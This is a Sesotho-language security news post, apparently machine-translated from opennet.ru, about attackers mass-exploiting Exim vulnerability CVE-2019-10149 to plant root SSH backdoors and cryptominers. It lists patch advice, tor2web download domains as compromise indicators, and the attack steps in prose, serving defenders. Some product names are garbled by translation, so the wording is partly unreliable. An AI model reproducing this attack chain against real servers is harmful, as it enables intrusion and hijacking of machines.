ProHoster > Blog > litaba tsa inthanete > Tlhaselo e kholo ho li-server tsa mangolo tse hlaselehang habonolo tsa Exim

Tlhaselo e kholo ho li-server tsa mangolo tse hlaselehang habonolo tsa Exim

Bafuputsi ba ts'ireletso ba tsoang Cybereason hlokomedisitse balaoli ba seva sa mangolo mabapi le ho tsebahatsa tlhaselo e matla ea boiketsetso bofokodi bo boholo (CVE-2019-10149) ho Exim, e fumanoe bekeng e fetileng. Nakong ea tlhaselo, bahlaseli ba finyella ts'ebetsong ea khoutu ea bona ka litokelo tsa metso le ho kenya malware ho seva bakeng sa li-cryptocurrencies tsa merafo.

Ho ea ka June boithuto bo ikemetseng Kabelo ea Exim ke 57.05% (selemong se fetileng 56.56%), Postfix e sebelisoa ho 34.52% (33.79%) ea li-server tsa poso, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). Ka data Ts'ebeletso ea Shodan e ntse e ka ba kotsing ea ho feta ho li-server tsa mangolo tse fetang limilione tse 3.6 marang-rang a lefats'e a sa kang a ntlafatsoa ho fihlela tokollo ea morao-rao ea Exim 4.92. Li-server tse ka bang limilione tse 2 tse ka bang kotsing li fumaneha United States, tse likete tse 192 Russia. Ka lesedi Khamphani ea RiskIQ e se e fetotse mofuta oa 4.92 oa 70% ea li-server tse nang le Exim.

Tlhaselo e kholo ho li-server tsa mangolo tse hlaselehang habonolo tsa Exim

Batsamaisi ba eletsoa ho kenya liapdeite ka potlako tse lokisitsoeng ke lisebelisoa tsa kabo bekeng e fetileng (Debian, Botho, bula SETE, Arch Linux, Fedora, EPEL bakeng sa RHEL/CentOS). Haeba sistimi e na le mofuta o tlokotsing oa Exim (ho tloha ho 4.87 ho isa ho 4.91 e kenyellelitsoeng), o hloka ho etsa bonnete ba hore sistimi ha e so senyehe ka ho hlahloba crontab bakeng sa mehala e belaetsang le ho etsa bonnete ba hore ha ho na linotlolo tse ling ho /root/. ssh directory. Tlhaselo e ka boela ea bontšoa ke boteng ba "firewall log" ea mesebetsi ho tsoa ho mabotho an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io le an7kmd2wp4xo7hpr.onion.sh, tse sebelisetsoang ho khoasolla malware.

Liteko tsa pele tsa ho hlasela li-server tsa Exim ngodisitsoe la 9 Phuptjane. Ka la 13 Phuptjane tlhaselo amoheloa boima sebopeho. Kamora ho sebelisa hampe tlokotsi ka liheke tsa tor2web, sengoloa se khoasolloa ho tsoa ts'ebeletso e patiloeng ea Tor (an7kmd2wp4xo7hpr) e lekola boteng ba OpenSSH (haeba ho se joalo. lihlopha), fetola litlhophiso tsa eona (lumella ho kena ka metso le netefatso ea senotlolo) ebe e beha mosebelisi ho metso Senotlolo sa RSA, e fanang ka monyetla oa ho fihlella sistimi ka SSH.

Ka mor'a ho theha backdoor, port scanner e kenngoa tsamaisong ho khetholla li-server tse ling tse tlokotsing. Sistimi e boetse e batlisisoa bakeng sa litsamaiso tse teng tsa merafo, tse hlakotsoeng haeba li tsejoa. Boemong ba ho qetela, moepo oa hau o jarollotsoe mme o ngolisoa ho crontab. Motho ea sebetsang morafong o khoasolla tlas'a sefahleho sa faele ea ico (ha e le hantle ke polokelo ea zip e nang le "no-password"), e nang le faele e sebetsang ka mokhoa oa ELF bakeng sa Linux le Glibc 2.7+.

Source: opennet.ru

Eketsa ka tlhaloso